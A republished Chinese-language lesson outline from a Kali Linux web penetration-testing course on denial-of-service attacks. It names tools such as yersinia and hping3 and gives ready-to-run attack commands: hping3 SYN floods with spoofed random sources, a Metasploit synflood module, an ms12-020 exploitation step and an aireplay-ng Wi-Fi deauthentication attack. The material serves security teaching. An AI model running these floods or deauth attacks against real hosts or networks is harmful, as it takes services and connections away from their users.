Kali Linux Web 滲透測試視頻教程— 第十六課-拒絕服務攻擊


Kali Linux Web 滲透測試視頻教程—
第十六課-拒絕服務攻擊

/玄魂

目錄

Kali Linux Web 滲透測試視頻教程第十六課-拒絕服務攻擊...................... 1

DoS............................................................................................................... 2

DDoS............................................................................................................... 2

yersinia........................................................................................................... 3

hping3............................................................................................................ 4

利用系統漏洞進行拒絕服務攻擊............................................................... 5

使用metasploit進行synflood攻擊............................................................. 5

無線網絡DoS................................................................................................ 5

Flood系列工具.............................................................................................. 6

 

視頻教程地址:http://edu.51cto.com/course/course_id-1887.html

DoS

l  拒絕服務攻擊即攻擊者想辦法讓目標機器停止提供服務

l  1.消耗帶寬,cpu,內存資源(各種洪水攻擊)

l  3.延長響應時間

l  4.利用服務漏洞,攻陷服務  

l  5.IP欺騙  

DDoS

yersinia

l   http://www.yersinia.net/

l   Yersinia是一款底層協議攻擊入侵檢測工具。它能實施針對多種協議的多種攻擊。例如奪取生成樹的根角色(生成樹協議:Spanning Tree Protocol),生成虛擬CDPCisco發現協議:Cisco Discovery Protocol)鄰居、在一個HSRP(熱等待路由協議:Hot Standby Router Protocol)環境中虛擬成一個活動的路由器、制造假DHCP反饋,以及其它底層攻擊。

l   yersinia -G

hping3

l    Hping是用於生成和解析TCPIP協議數據包的開源工具。創作者是Salvatore Sanfilippo。目前最新版是Hping3,支持使用tcl腳本自動化地調用其APIHping是安全審計、防火牆測試等工作的標配工具。

l     Hping優勢在於能夠定制數據包的各個部分,因此用戶可以靈活對目標機進行細致地探測。

l   使用手冊:http://linux.die.net/man/8/hping3

l  hping3 -S --flood -V www.xxx.com

l  hping3 -S -P -U --flood -V --rand-source  www.xxx.com

l  hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source www.xxx.com

利用系統漏洞進行拒絕服務攻擊

l  示例:

l  掃描開發445 或者3389的機器

l  利用ms12-020漏洞

l  使用metasploit進行攻擊

使用metasploit進行synflood攻擊

l  use auxiliary/dos/tcp/synflood

無線網絡DoS

l   1. iwconfig

l   airmon-ng start wlan0

l   airodump-ng mon0

l   Connect to the Access Point

l   aireplay-ng --deauth 1000 -a 00:09:5B:6F:64:1E-h 44:6D:57:C8:58:A0 mon0

Flood系列工具

 

ps:對此文章感興趣的讀者,可以加qq群:Hacking:303242737;Hacking-2群:147098303Hacking-3群:31371755hacking-4:201891680;Hacking-5群:316885176

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM